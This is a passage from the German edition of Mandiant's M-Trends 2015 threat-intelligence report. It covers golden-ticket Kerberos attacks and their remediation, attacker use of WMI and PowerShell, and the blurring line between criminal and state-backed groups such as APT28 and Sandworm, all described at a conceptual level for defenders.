Dieses sogenannte „goldene Ticket“ kann offline erstellt werden und eine unbegrenzte Gültigkeits-dauer haben . Mit einem solchen Ticket kann der Angreifer auf jedes Konto in der Domäne zugreifen, auch nachdem das entsprechende Kennwort geändert wurde . Ein Angreifer mit einem „goldenen Ticket“ kann also erneut in eine einmal gehackte Umge-bung eindringen und sich sofort wieder Administra-torprivilegien verschaffen, selbst nachdem der ursprüng liche Angriff abgewehrt, alle Kennwörter geändert und die vom Hacker vorgenommenen Änderungen rückgängig gemacht wurden .

Um ein System nach einem Angriff mit einem „gol-denen Ticket“ erneut zu sichern, muss das Kenn-wort für das Servicekonto krbtgt zweimal hinter-einander geändert werden . Dieses Konto wird in Kerberos für die Authentifizierung und Schlüssel-verteilung verwendet . Beim zweimaligen Ändern des Kennworts werden die Kennwort-Historie des Kontos gelöscht und alle vorhandenen Kerberos- Tickets annulliert .

Navigation mit WMI und PowerShell

In der Vergangenheit mussten Angreifer eine Kom-bination aus Windows-Funktionen wie net und at, speziell erstellter Malware, Batchdateien oder VBS-Skripte und Administratortools wie PsExec nutzen, um eine Windows-Umgebung auszuspio nieren und dort Befehle auszuführen . Diese Methoden waren bewährt und bequem, hinterließen jedoch Spuren, die bei einer forensischen Analyse ausgewertet werden konnten .

In den Jahren 2013 und 2014 stiegen mehrere der von uns beobachteten APT-Gruppen auf völlig neue Navigationsmethoden um . Diese Gruppen nutzen

nun häufiger WMI und PowerShell, um Windows- Umgebungen auszuspionieren, Anmel dedaten zu stehlen und für sie nützliche Daten zu finden .

Seit einigen Jahren wird PowerShell auch von zahl-reichen Informationssicherheitsspezialisten und als Bestandteil von Tools für Penetrations tests genutzt . Aufgrund dessen sind nun mehr Informationen und Quellcode öffentlich zugänglich, sodass Angreifer und Verteidiger sich besser informieren können .

Oben wurde beschrieben, wie Angreifer WMI- Ereignisse nutzen, um sich dauerhaften Zugang zu gehackten Umgebungen zu verschaffen . Darüber hinaus nutzen Angreifer auch das Befehlszeilentool wmic.exe, das die Funktionen von WMI auf Shells und Skripte ausdehnt . Mit WMI können Angreifer sich per Fernzugriff Zugang zu Systemen verschaf-fen, Änderungen in der Registry vornehmen, auf Logdateien zugreifen und natürlich Befehle aus-führen . Bis auf die Anmeldung lassen per Fernzu-griff ausgeführte WMI-Befehle kaum Spuren auf den betroffenen Systemen zurück .

In mehreren der von uns 2014 untersuchten Fälle nutzten Angreifer per Fernzugriff gestartete Pow-erShell-Befehle und -Skripte, die vollständig im Ar-beitsspeicher ausgeführt wurden, um Umgebungen auszuspionieren und Anmeldedaten zu stehlen . Da der PowerShell-Code vollständig im Arbeitsspei-cher ausgeführt wird, hinterlässt er keine Spuren auf der Festplatte, was die Analyse dieser Vorfälle deutlich erschwert . In den meisten Umgebungen ist standardmäßig eine ältere Version von PowerShell installiert, doch auch diese kann keinen detaillierten Audit-Trail des ausgeführten Quellcodes aufzeich-nen .

Fazit: Technisch versierte Angreifer entwickeln ihre Tools und Methoden ständig weiter, um so wenig forensisch auswertbare Spuren zu hinterlassen wie möglich und dadurch länger unentdeckt zu bleiben. Deshalb müssen Unternehmen in der Lage sein, die Aktivitäten auf allen Systemen, Protokollquellen und Netzwerkgeräten in ihrer Infrastruktur sowohl in Echtzeit zu überwachen als auch rückblickend foren­sisch zu analysieren. Um Angreifern einen Schritt voraus zu sein, müssen die IT­ Sicherheitsverantwortlichen in Unternehmen mit dem Muster der normalen Aktivi­täten vertraut sein und alle Abweichungen von diesem Muster untersuchen.

Page 22: M-Trends 2015: Ein Blick in die Praxis

20 www .mandiant .com

Ein Bericht von der CyberfrontM-Trends

Im Verlauf des Jahres 2014 konnten wir mehrere Angriffe zu russischen Hackern zurückverfolgen, stießen dann jedoch auf eine Grauzone, in der es

sehr schwierig war, zu entscheiden, ob es sich um eine kriminelle Bande oder einen staatlichen An-greifer handelte . Da die verwendeten Tools und Methoden kaum noch voneinander zu unterschei-den sind, müssen die Analysten die Absichten des Angreifers untersuchen, um die potenziellen Aus-wirkungen eines Angriffs richtig einschätzen zu können .

Einige Gruppen, deren Aktivitäten wir beobachten, greifen gezielt Unternehmen im Finanzwesen an, nutzen dazu aber Methoden, die größere Ähnlich-keiten mit staatlich gesponserten APT-Aktivitäten aufweisen als mit den Aktivitäten gewöhnlicher, finan ziell motivierter Krimineller . Abbildung 10 auf Seite 21 zeigt, wie die von uns 2014 untersuchten Angriffe bekannter APT-Gruppen und gewöhnli-cher Internetkrimineller einander in verschiedenen Bereichen überlappen .

Im Zeichen der Unsicherheit die Absicht durchschauen – kein leichtes Unterfangen

Aufgrund dieser Überlappungen ist es wichtig, dass Sicherheitsspezialisten bei der Untersuchung un-voreingenommen vorgehen und nicht anhand einer Methode oder eines verwendeten Tools vorschnell Rückschlüsse auf den Angreifer und seine Absich-ten ziehen . Die Aktivitäten einer von uns beobach-teten, in Russland ansässigen Hackergruppe im Jahr 2014 sind ein gutes Beispiel dafür, warum es so schwierig ist, die Ziele eines Angreifers zu durch-schauen und warum dieses Wissen für die Deutung des Angriffsverlaufs wichtig ist .

Im Oktober 2014 beschrieben wir die Aktivitäten von APT28 . Wir sind der Überzeugung, dass diese Hackergruppe im Auftrag der russischen Regierung vertrauliche politische und militärische Daten stiehlt . APT28 griff mehrere Jahre lang Rüstungs-firmen, militärische Einrichtungen, sowie staatliche und zwischenstaatliche Organisationen an .

Andere Forscher entlarvten eine weitere in Russ-land ansässige Angreifergruppe, die anscheinend ebenfalls im Auftrag der russischen Regierung spio-niert . Diese zweite Gruppe wird von verschiedenen Forschern als „Sandworm Team,“9, „Quedagh“10 oder „BE2 APT“11 bezeichnet . .

Trend Nr. 4: Die Grenzen verschwimmen – Kriminelle und APT-Actors imitieren einanderUnsere Untersuchungen im Jahr 2014 haben bestätigt, dass sich ein neuer Trend abzeichnet: Internetkriminelle eignen sich Taktiken an, die von APT-Actors ent-wickelt wurden, während APT-Actors oft dieselben Tools nutzen wie gewöhnliche Internetkriminelle. Da die verwendeten Taktiken kaum noch voneinander zu un-terscheiden sind, müssen Analysten die Ziele der Angreifer verstehen, um die Aus-wirkungen eines Angriffs abschätzen zu können und eine Sicherheitsstrategie zu erstellen, die auf die vorhandenen Risiken abgestimmt ist.

9 iSight Partners, „Cyber Espionage Operators Sandworm Team Leverage CVE-2014-4114 Zero-Day“, 14 . Oktober 2014, online, aufgerufen am 2. Dezember 2014

10 https://www .f-secure .com/documents/996508/1030745/blackenergy_whitepaper .pdf11 https://securelist .com/blog/research/67353/be2-custom-plugins-router-abuse-and-target-profiles/

Page 23: M-Trends 2015: Ein Blick in die Praxis

www .mandiant .com 21

12 https://www .fireeye .com/blog/threat-research/2014/04/crimeware-or-apt-malwares-fifty-shades-of-grey .html13 APT18 ist eine in China ansässige Hackergruppe, siehe https://www2 .fireeye .com/WBNR-14Q3HealthcareWebinar .html .

Angriffsart oder -merkmal Beispiele ähnlicher Nutzung durch kriminelle und staatlich gesponserte Angreifer

Social Engineering

Social Engineering ist kein Alleinstellungsmerkmal von APT-Gruppen mehr . Im Jahr 2014 verschickten mehrere finanziell motivierte Angreifergruppen Spear-Phishing-E-Mails, sowohl als ersten Angriffs-vektor als auch in wiederholten Versuchen, sich nach der Abwehr eines Angriffs erneut Zugang zum Netzwerk des Opfers zu verschaffen . Die genutzten Phishing-E-Mails wurden dabei individuell auf die Empfänger abgestimmt .

Interaktives Social Engineering wird ebenfalls von beiden Angreifertypen eingesetzt . In einem von uns untersuchten Vorfall erstellten die finanziell motivierten Angreifer Profile in beliebten sozialen Netz-werken und nahmen Kontakt mit den Mitarbeitern des Zielunternehmens auf, um sie zum Herunter-laden von Backdoors zu bewegen . Auch APT3, ein vermutlich staatlich gesponserter Angreifer, nutzte einen weiblichen Avatar in einem beliebten sozialen Netzwerk, um mit einem Mitarbeiter eines Zielun-ternehmens in Kontakt zu treten . Nachdem „sie“ drei Wochen lang Nachrichten mit dem Mitarbeiter ausgetauscht hatte, schickte „sie“ einen Lebens lauf an seine persönliche E-Mail-Adresse, der eine von APT3 entwickelte Backdoor enthielt . In gezielten Fragen an andere Mitarbeiter des Unternehmens versuchte „sie“ außerdem, den Namen des IT-Managers und Einzelheiten über die verwendeten Soft-wareversionen in Erfahrung zu bringen .

Speziell erstellte Malware und Tools

Das Erstellen eigener, auf bestimmte Situationen zugeschnittener Tools wurde sowohl bei APT-Actors als auch bei finanziell motivierten Internetkriminellen beobachtet . In einem Fall hatten Internetkrimi-nelle mehrere Jahre lang Zugang zur Infrastruktur eines Opfers . In dieser Zeit entwickelten und nutzten sie über 60 verschiedene Varianten von Malware und Tools . Die in Russland ansässige Gruppe APT28 entwickelt ihre Malware seit über sieben Jahren systematisch weiter und erstellt Malware-Plattformen, die flexibel genug sind, um in infiltrierten Umgebungen langfristig unerkannt zu bleiben .

Crimeware

Als Crimeware bezeichnen wir Malware-Toolkits, die kostenlos oder auf dem Schwarzmarkt erhältlich sind . Sie werden nicht nur von finanziell motivierten Internetkriminellen genutzt . Eine vermutlich in Russ land ansässige APT-Gruppe nutzte Zero-Day-Angriffe, um Varianten von BlackEnergy zu installie-ren . Das Toolkit BlackEnergy ist bei Internetkriminellen seit Jahren sehr beliebt . Auch viele Remote- Access-Tools werden sowohl von APT-Actors als auch von Internetkriminellen genutzt .12 Deshalb reicht eine Analyse der genutzten Tools allein nicht aus, um die Angriffsart zu bestimmen .

Lange Verweildauer in einer gehackten Infrastruktur

Die Zeit, in der finanziell motivierte Internetangriffe in puncto Geschwindigkeit und Brutalität durchaus mit einem Banküberfall vergleichbar waren, ist vorbei . Eine lange Verweildauer in einer infizierten Um-gebung war früher ein Anzeichen für einen APT-Initiator, der einen komplexeren Auftrag zu erfüllen hat . Inzwischen haben jedoch auch finanziell motivierte Hacker gezeigt, dass sie sich unauffällig verhalten können . In einem Fall nutzten Internetkriminelle bekannte Speicherorte für das Systemstartverzeichnis, um ihre Malware zu starten . In einem anderen Fall hatten finanziell motivierte Hacker über fünf Jahre lang Zugriff auf die Infrastruktur ihres Opfers, bevor ihre Aktivitäten bemerkt wurden . Wir haben sogar hartnäckige finanziell motivierte Angreifer beobachtet, die versuchten, erneut in eine Umgebung einzu-dringen, aus der sie entfernt worden waren .

Datendiebstahl

Der Datendiebstahl breitet sich aus, nicht nur hinsichtlich des Volumens und der Art der gestohlenen Daten, sondern auch hinsichtlich der Akteure . Das bevorzugte Ziel sind weiterhin große Verzeichnisse personenbezogener Daten . Finanziell motivierte Kriminelle stehlen solche Daten für Betrugsversuche oder um sie auf dem Schwarzmarkt zu verkaufen . Inzwischen sind jedoch auch andere Angreifer an personenbezogenen Daten interessiert . Sie verfolgen dabei jedoch keine finanziellen Ziele . Wir haben beispielsweise beobachtet, dass APT18 und andere APT-Gruppen personenbezogene Daten stehlen – ein bislang völlig untypisches Verhalten für diesen Angreifertyp .13

Abbildung 10: Ähnlichkeiten im Vorgehen von APT-Gruppen und Internetkriminellen

Page 24: M-Trends 2015: Ein Blick in die Praxis

22 www .mandiant .com

Ein Bericht von der CyberfrontM-Trends

Diese Gruppe schien es auf ähnliche Ziele abgese-hen zu haben wie APT28, es gab jedoch einige wich-tige Unterschiede . Zum einen nutzte die Gruppe Zero-Day-Schwachstellen und Schwarzmarkt- Malware . Zum anderen gibt es Anzeichen dafür, dass sie kritische Infrastruktureinrichtungen in den USA angriff .14, 15

Eine Analyse der bei diesen Angriffen genutzten Malware und Infrastruktur ergab, dass das Sand-worm-Team das Toolkit BlackEnergy16 nutzte, um Ziele in der Ukraine anzugreifen . Das würde die an-haltenden Spannungen zwischen der Ukraine und Russland widerspiegeln . Manchen Berichten zu-folge soll dieselbe Gruppe das Toolkit BlackEnergy auch zu Angriffen auf SCADA-Systeme (Superviso-ry Control and Data Acquisition) benutzt haben .17

Bei den angegriffenen Systemen handelte es sich um Produktionssysteme in verschiedenen Branchen, und nicht um herstellerspezifische Prototypen oder Netzwerke, in denen vertrauliche Finanzdaten oder geistiges Eigentum gespeichert oder übertragen werden . Deshalb liegt die Vermutung nahe, dass die Angreifer Schwach stellen auskundschaften wollten, die in Sabotage versuchen ausgenutzt werden könn-ten . Durch die Nutzung gängiger Schwarzmarkt-tools wie BlackEnergy wollten die Angreifer ver-mutlich ihre Anonymität wahren und bei Bedarf glaubhaft abstreiten können, etwas mit diesem An-griff zu tun gehabt zu haben .

Welche Rolle spielen diese Unterschiede?

In der Sicherheitsbranche ist umstritten, wie wich-tig es ist, die Ziele eines Angreifers zu erkennen oder herauszufinden, welcher Hacker oder welche Gruppe hinter einem bestimmten Angriff steckt . Manche Forscher sind der Meinung, dass die Iden-tität des Angreifers unter dem Gesichtspunkt der Netzwerksicherheit keine Rolle spielt . Wichtig ist,

dass der Angriff abgewehrt, die Schäden beseitigt und Wiederholungen verhindert werden .

Zudem wird es durch die einander überlappenden Tools und Taktiken von finanziell motivierten Krimi-nellen und APT-Actors auch immer schwieriger, Fragen hinsichtlich der Absichten und potenziellen Auswirkungen zu beantworten . Auch die Täu-schungsmanöver und Lügen der Angreifer, die un-terschiedliche Verfolgung von Straftaten in ver-schiedenen Ländern und die äußerst komplizierten Beziehungen zwischen korrupten Regierungsbeam-ten und dem kriminellen Untergrund tragen zur Undurchsichtigkeit der Situation bei .

Doch das Durchschauen der Absichten und Beweg-gründe eines Angreifers kann einen Anhaltspunkt dafür geben, wie ein Angriff am besten abgewehrt werden kann . Ein typisches Beispiel ist das bereits erwähnte Sandworm-Team, das vermutlich im Auf-trag der russischen Regie rung Spionage betreibt und mithilfe gängiger Schwarzmarkt-Malware ver-sucht, Zugang zu kritischen Infrastruktureinrich-tungen in den USA zu erlangen . Obwohl die genutz-ten Tools aus technischer Sicht nichts Besonderes sind, wäre es ein großer Fehler, diese Angriffe wie die nahezu alltäglichen Angriffe der „kleinen Fische“ unter den Internetkriminellen zu behandeln .

Wenn Sie wüssten, dass die Malware in Ihrem Netz-werk nur die erste Etappe eines staatlich beauftrag-ten Angriffs ist, würden Sie sicher anders darauf re-agieren als auf eine Infektion mit Malware, die von Opportunisten in einem breit gestreuten Angriff eingeschleust wurde . Auch bei einem Diebstahl personenbezogener Daten hängt die Reaktion da-von ab, ob die Diebe gewöhnliche Kriminelle sind, die sich „nur“ auf Ihre Kosten bereichern wollen, oder ob die Daten aus schwerer durchschaubaren Gründen im Auftrag einer Regierung gestohlen wurden .

14 http://blog .trendmicro .com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/15 https://www .virusbtn .com/conference/vb2014/abstracts/LM3-LipovskyCherepanov .xml 16 BlackEnergy ist ein erweiterbares Framework, das Hacker mithilfe einer Sammlung aus DLL-Dateien (Dynamic Link Libraries) durch die gewünschten

Funktionen ergänzen können . Jedes DLL-Plugin kann für einen bestimmten Zweck geschrieben oder modifiziert und als verschlüsselte Datei gespei- chert werden . In ihrer verschlüsselten Form sehen die DLL-Dateien alle gleich aus und lassen keine Rückschlüsse auf die Absichten des Angreifers zu . Bislang wurde BlackEnergy hauptsächlich für DDoS-Angriffe (Distributed Denial of Service, verteilte Dienstblockade) verwendet, siehe http://at-las-public .ec2 .arbor .net/docs/BlackEnergy+DDoS+Bot+Analysis .pdf; http://blogs .mcafee .com/business/security-connected/evolving-ddos-botnets-1- blackenergy)

17 http://blog .trendmicro .com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/

Fazit: Da die Tools, Methoden und Vorgehensweisen von Internetkriminellen und APT­Actors einander immer mehr ähneln, gewinnt die Analyse der Ziele und Beweg­gründe der Angreifer an Bedeutung. Nur so können Sie die potenziellen Auswirkun­gen eines Angriffs auf Ihre Infrastruktur richtig einschätzen, angemessen reagieren und eine Sicherheitsstrategie entwickeln, die auf die tatsächlich bestehenden Be­dro hungen abgestimmt ist.

Page 25: M-Trends 2015: Ein Blick in die Praxis

www .mandiant .com 23

Das Thema Cybersecurity interessiert in-zwischen ein breites Publikum . Angesichts dieser Tatsache sollten Einbrüche in die In-

frastruktur des eigenen Unternehmens nicht mehr als etwas betrachtet werden, vor dem man sich fürchtet oder für das man sich schämen muss . An-griffe dieser Art sind inzwischen Teil der geschäftli-chen Realität . Deshalb gilt es, sich auf sie vorzube-reiten und selbstsicher auf sie zu reagieren .

Eine solche Selbstsicherheit setzt einen neuen An-satz für die Cybersecurity voraus . Niemand kann jeden Angriff abwehren . Doch wenn Sie die raffi-niertesten Bedrohungen schnell und effektiv auf-decken, analysieren und angemessen auf sie reagie-ren, können Sie Ihr Unternehmen, Ihre Kunden und Ihre Partner vor Konsequenzen bewahren, die Schlagzeilen machen .

Sicherheitsmaßnahmen sind nie perfekt und nie-mand kann jede neue Angriffsmethode vorherse-hen . Auch 2014 wurde wieder deutlich, dass kein Internetkrimineller aufgibt, nur weil ein Angriff durch ein neues Sicherheitstool vereitelt wurde .

Doch mit der richtigen Kombination aus Technik, Informationen und Sachkenntnis können Sie die Lücken in Ihren Sicherheitsvorkehrungen schließen . Sie können Ihre Sicherheitsmaß nahmen ständig weiterentwickeln, um neuen Bedrohungen, neuen Tools und neuen Angriffsmaschen gewachsen zu sein und Ihr Netzwerk zu schützen .

Die Angreifer sind intelligent, gut ausgerüstet und hartnäckig. Es gibt keinen Grund, warum dies nicht auch auf die Verteidiger zutreffen sollte.

Schlussfolgerung Auch 2014 entwickelten die Hacker sich weiter und fanden neue Methoden, um den Kreis ihrer Opfer auszuweiten. Doch in einem wichtigen Punkt blieb alles beim Alten: Zu viele Unternehmen waren nicht auf den früher oder später unvermeidli-chen Angriff vorbereitet, sodass die Eindringlinge viel zu lange unbemerkt blieben.

Page 26: M-Trends 2015: Ein Blick in die Praxis

24 www .mandiant .com

Ein Bericht von der CyberfrontM-Trends

Über Mandiant

Mandiant, ein Tochterunternehmen von FireEye, hat die Computernetzwerke und Endpunkte von Hunder-ten von Unternehmen in allen wichtigen Branchen von Eindringlingen befreit und gegen erneute Angriffe gesichert . Mandiant ist der bevorzugte Partner für Fortune-500-Unternehmen und Behörden, die kritische Sicherheitsverletzungen aller Art verhindern oder angemessen auf sie reagieren möchten . Mandiant Securi-ty Consulting Services nutzen Bedrohungsdaten und Technik von FireEye, um die Opfer von Cyberangriffen beim Kampf gegen die Angreifer und der erneuten Sicherung ihrer Netzwerke zu unterstützen .

Über FireEye

FireEye schützt die wertvollsten Ressourcen weltweit vor Internetangriffen . Unsere Kombination aus Tech-nik, Wissen, Expertise und einem äußerst reaktionsschnellen Notfallteam trägt dazu bei, die Auswirkungen von Angriffen zu mindern . Wir entlarven und stoppen Angreifer in jeder Phase eines Angriffs und decken Angriffe auch im frühesten Stadium auf . Mit unserer Hilfe können Sie ermitteln, welchem Risiko Ihre wert-vollsten Ressourcen bei einem Angriff ausgesetzt wären . Darüber hinaus unterstützen wir Sie dabei, sich für die schnelle und erfolgreiche Abwehr von Angriffen zu rüsten . Die weltweite Gemeinschaft von FireEye für die Cybersecurity umfasst über 2 .700 Kunden in 67 Ländern, darunter mehr als 157 Fortune-500-Unter-nehmen .

Page 27: M-Trends 2015: Ein Blick in die Praxis
Page 28: M-Trends 2015: Ein Blick in die Praxis

Mandiant, ein Tochterunternehmen von FireEye® | (+1) 703 .683 .3141 | (+1) 800 .647 .7020 | info@mandiant .com | www.mandiant.com

© 2015 FireEye, Inc. Alle Rechte vorbehalten. Mandiant und das M-Logo sind eingetragene Marken von FireEye, Inc. Alle anderen Marken, Produkte oder Servicenamen sind möglicherweise eingetragene Marken oder Servicemarken ihrer jeweiligen Inhaber. RPT.MTRENDS.DE-DE.022415

A FireEye® Company